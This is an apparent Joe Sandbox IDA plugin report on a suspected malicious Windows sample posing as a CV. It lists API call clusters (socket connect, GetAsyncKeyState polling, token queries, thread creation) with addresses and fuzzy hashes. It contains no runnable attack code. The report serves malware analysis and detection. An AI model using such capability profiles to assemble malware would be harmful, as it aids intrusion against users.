                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1389676194-0
                                                                                            • Opcode ID: 95e8672af173d779372e8ec6a61fe54ec3ab3f5cb04b88f80524298b0b69c163
                                                                                            • Instruction ID: 72edda0c518d5716388ed6dcb352e6f301856d29b5e391104207f771eaa0c109
                                                                                            • Opcode Fuzzy Hash: 95e8672af173d779372e8ec6a61fe54ec3ab3f5cb04b88f80524298b0b69c163
                                                                                            • Instruction Fuzzy Hash: 2A41E835A00205EFCB05EF64C995EADBBF5FF49310B1480A9E90AAB362CB31ED41DB51
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                            • ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                            • String ID:
                                                                                            • API String ID: 4210589936-0
                                                                                            • Opcode ID: 4d4e312a672031d2007ba3299c202badc22e42a585f58de3c60e1b8d4600703c
                                                                                            • Instruction ID: fb9aed2aeff745d6eaf86064196e3e0bb8ba5d52be24bb8e8c5cd23a1b4c40b1
                                                                                            • Opcode Fuzzy Hash: 4d4e312a672031d2007ba3299c202badc22e42a585f58de3c60e1b8d4600703c
                                                                                            • Instruction Fuzzy Hash: 4841AF34604215FBDF199F64D884AEDBBB4FB05324F11431AF829962A0CB34ED94DFA1
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FB369
                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 000FB413
                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000FB41B
                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 000FB429
                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000FB431
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3382505437-0
                                                                                            • Opcode ID: 1a1f772136c7f511477d44f8f0ab14f0695ba7beff7a67f1dde4bc3cdc81f558
                                                                                            • Instruction ID: 289d6c83db9392954235f5a7fe2dc31b293000ed0d4a2590717d5ca3b9971444
                                                                                            • Opcode Fuzzy Hash: 1a1f772136c7f511477d44f8f0ab14f0695ba7beff7a67f1dde4bc3cdc81f558
                                                                                            • Instruction Fuzzy Hash: 6131EE7190021DEBDF04CFA8D94CAAE3BB5EB04315F014229FA20AA5D1C3B0DA54DF90
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 000FDBD7
                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000FDBF4
                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000FDC2C
                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000FDC52
                                                                                            • _wcsstr.LIBCMT ref: 000FDC5C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                            • String ID:
                                                                                            • API String ID: 3902887630-0
                                                                                            • Opcode ID: 69596c7e1f335391045b465ab64c7214b8cb751007f9d14647f4332ebeb60de3
                                                                                            • Instruction ID: 5ba2bd394470bb3ce41d9cd3a5db25deded9c6d10140a6d024b57efffc08484c
                                                                                            • Opcode Fuzzy Hash: 69596c7e1f335391045b465ab64c7214b8cb751007f9d14647f4332ebeb60de3
                                                                                            • Instruction Fuzzy Hash: 3E214C71204205BBEB159F35AC49E7F7BA9DF45710F11803BFA09CA151EAA1CC40E2A0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000FBC90
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000FBCC2
                                                                                            • __itow.LIBCMT ref: 000FBCDA
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000FBD00
                                                                                            • __itow.LIBCMT ref: 000FBD11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$__itow
                                                                                            • String ID:
                                                                                            • API String ID: 3379773720-0
                                                                                            • Opcode ID: ab2c20e483f01307c940b0a71011413dbfd3ec6dedf5d4f9a4a634d882a92f63
                                                                                            • Instruction ID: 4d1af341898f4095ef4a0d41ed5935a8e47da4b1c649cc1836e2cc16798acc05
                                                                                            • Opcode Fuzzy Hash: ab2c20e483f01307c940b0a71011413dbfd3ec6dedf5d4f9a4a634d882a92f63
                                                                                            • Instruction Fuzzy Hash: 7C21CC3570060CBADB20AB65DC45FEF7AA9AF5A710F010024FB05EB582EB70C9455BA2
                                                                                            APIs
                                                                                              • Part of subcall function 000C50E6: _wcsncpy.LIBCMT ref: 000C50FA
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,001060C3), ref: 00106369
                                                                                            • GetLastError.KERNEL32(?,?,?,001060C3), ref: 00106374
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001060C3), ref: 00106388
                                                                                            • _wcsrchr.LIBCMT ref: 001063AA
                                                                                              • Part of subcall function 00106318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001060C3), ref: 001063E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 3633006590-0
                                                                                            • Opcode ID: 3816d84f4df2fa4d422ea21092c615ebb6ad341e416fb42db4fc6139f88471e0
                                                                                            • Instruction ID: 405a293c2a6c1b946da6ad376a655b02f4f0948ec790b7ebbd241fad20874cff
                                                                                            • Opcode Fuzzy Hash: 3816d84f4df2fa4d422ea21092c615ebb6ad341e416fb42db4fc6139f88471e0
                                                                                            • Instruction Fuzzy Hash: EE21D5315042159ADF15AB78AC42FEA23ACFF1A360F10446AF1C9DB1D1EBE0D9D08AA4
                                                                                            APIs
                                                                                              • Part of subcall function 0011A82C: inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00118BD3
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118BE2
                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00118BFE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnectinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 3701255441-0
                                                                                            • Opcode ID: 3725c057b1b7336a16e42a57c163c9e9acdbd7fa43c052d78a66cdb655a0b76a
                                                                                            • Instruction ID: 60d5e40da011e7a0d89e6f859e6067bb916970196e011e757610e9fc07f5f840
                                                                                            • Opcode Fuzzy Hash: 3725c057b1b7336a16e42a57c163c9e9acdbd7fa43c052d78a66cdb655a0b76a
                                                                                            • Instruction Fuzzy Hash: 3121C0312002149FCB14EF68DC85FBE77A9AF59724F048459F946AB3E2CF70AD418BA1
                                                                                            APIs
                                                                                            • IsWindow.USER32(00000000), ref: 00118441
                                                                                            • GetForegroundWindow.USER32 ref: 00118458
                                                                                            • GetDC.USER32(00000000), ref: 00118494
                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 001184A0
                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 001184DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                            • String ID:
                                                                                            • API String ID: 4156661090-0
                                                                                            • Opcode ID: 397c8370ed4661f7fe59c03bdbb83bc7dd320f38951136bcf241a4773f290667
                                                                                            • Instruction ID: 2ad18d0adc8f9a99483c798efb3b10c383b1312c168109fd21e85023f37b21f7
                                                                                            • Opcode Fuzzy Hash: 397c8370ed4661f7fe59c03bdbb83bc7dd320f38951136bcf241a4773f290667
                                                                                            • Instruction Fuzzy Hash: 7D216F76A00204AFDB04DFA4DC85AAEBBE5EF49301F058479E85997662DF70AC40CB60
                                                                                            APIs
                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                            • BeginPath.GDI32(?), ref: 000DB009
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            • Opcode ID: 41642055037032114f8134c8e5f7e3a6d3da3ce19d459c6c276993e9cdd5855e
                                                                                            • Instruction ID: 225c4534b7d6cef63fd8671e4cb623520b3895190801ccc073a3d02223886bdb
                                                                                            • Opcode Fuzzy Hash: 41642055037032114f8134c8e5f7e3a6d3da3ce19d459c6c276993e9cdd5855e
                                                                                            • Instruction Fuzzy Hash: 3E2171B6900305FFDB219F55EC4479E7BACBB11355F24422AF465926A0E3B14AC2CFA1
                                                                                            APIs
                                                                                            • __calloc_crt.LIBCMT ref: 000E21A9
                                                                                            • CreateThread.KERNEL32(?,?,000E22DF,00000000,?,?), ref: 000E21ED
                                                                                            • GetLastError.KERNEL32 ref: 000E21F7
                                                                                            • _free.LIBCMT ref: 000E2200
                                                                                            • __dosmaperr.LIBCMT ref: 000E220B
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                            • String ID:
                                                                                            • API String ID: 2664167353-0
                                                                                            • Opcode ID: 0e9582d3e135bec5481f75015bccd7f37a78e35a266c3bbc2bf570d00c0752b6
                                                                                            • Instruction ID: a42e83ffece8d5320ab5655272fcf21881ebf7bcb7394207ae9098b73d9fb176
                                                                                            • Opcode Fuzzy Hash: 0e9582d3e135bec5481f75015bccd7f37a78e35a266c3bbc2bf570d00c0752b6
                                                                                            • Instruction Fuzzy Hash: 171108321053C6AFDB11AF67EC41DEB37DCEF41770B10042DFA18A6192DB31C81186A1
                                                                                            APIs
                                                                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                            • GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
                                                                                            • HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 842720411-0
                                                                                            • Opcode ID: 622d723767ac1b0a557798f7055674eb34015b4785cca656485d51fd48ac59d7
                                                                                            • Instruction ID: 62774049778acbcee11016ba43b7d0a0f08ae4d51740c8638262bedde38b2909
                                                                                            • Opcode Fuzzy Hash: 622d723767ac1b0a557798f7055674eb34015b4785cca656485d51fd48ac59d7
                                                                                            • Instruction Fuzzy Hash: EC0119B5300208BFDF104FA9EC48DAB3BADEF8B7557100469F949C3660DA719C80DBA1
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107A74
                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00107A82
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00107A8A
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00107A94
                                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                            • String ID:
                                                                                            • API String ID: 2833360925-0
                                                                                            • Opcode ID: 127c6889c3f45d5db002ee299576d7251a70822e23484504759190523f284ba7
                                                                                            • Instruction ID: e80a4814bddc2260ca3d5e274053e8fcb1dff69e0d4bb82ae81cf9c84b82edea
                                                                                            • Opcode Fuzzy Hash: 127c6889c3f45d5db002ee299576d7251a70822e23484504759190523f284ba7
                                                                                            • Instruction Fuzzy Hash: CC012D75E0461DEBCF04AFE4EC48AEDBB78FB09711F050455D942B32E0DB70AA9087A1
                                                                                            APIs
                                                                                            • CLSIDFromProgID.OLE32 ref: 000F9ADC
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 000F9AF7
                                                                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 000F9B05
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000F9B15
                                                                                            • CLSIDFromString.OLE32(?,?), ref: 000F9B21
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 3897988419-0
                                                                                            • Opcode ID: e061bd179ea96529b80ec8f1675f8a0708b2a95699bebffc7050c8a780a14493
                                                                                            • Instruction ID: 4fa5917f6dbaf1390a2196176d73958e280916ac170c14ed233f480f6dab649f
                                                                                            • Opcode Fuzzy Hash: e061bd179ea96529b80ec8f1675f8a0708b2a95699bebffc7050c8a780a14493
                                                                                            • Instruction Fuzzy Hash: 2B018F7A60021ABFDB114F64ED44BBE7AEDEB45351F144024FA05D2620D771DD80ABA0
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000FAA79
                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000FAA83
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000FAA92
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000FAA99
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000FAAAF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: 830c29f82d0d52b8ca778235943e94d9e953c6d89c829e4a08b4ad4d3c409e80
                                                                                            • Instruction ID: 0ca25371a858213d401f6a2eeb8ffed7d7b5166582d8018fa4c94f27021c8eb0
                                                                                            • Opcode Fuzzy Hash: 830c29f82d0d52b8ca778235943e94d9e953c6d89c829e4a08b4ad4d3c409e80
                                                                                            • Instruction Fuzzy Hash: 83F044753002186FDB115FA4AC89E773BACFF8B754F000419FA45C7560D7609C45DA72
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000FAADA
                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAE4
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAF3
                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAFA
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAB10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: 1cf9028284f1d86d2a43cfc6b01a64680d610038a829d8b10b99f2cbf1c430d1
                                                                                            • Instruction ID: f5112a57bdc748567a736e166e30c42e97deca4007b26a093da3ee0208abfe48
                                                                                            • Opcode Fuzzy Hash: 1cf9028284f1d86d2a43cfc6b01a64680d610038a829d8b10b99f2cbf1c430d1
                                                                                            • Instruction Fuzzy Hash: 9BF04FB53002086FEB110FA4FC98E7B3BADFF47754F000029FA49C75A0CB6098419A61
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEC94
                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 000FECAB
                                                                                            • MessageBeep.USER32(00000000), ref: 000FECC3
                                                                                            • KillTimer.USER32(?,0000040A), ref: 000FECDF
                                                                                            • EndDialog.USER32(?,00000001), ref: 000FECF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3741023627-0
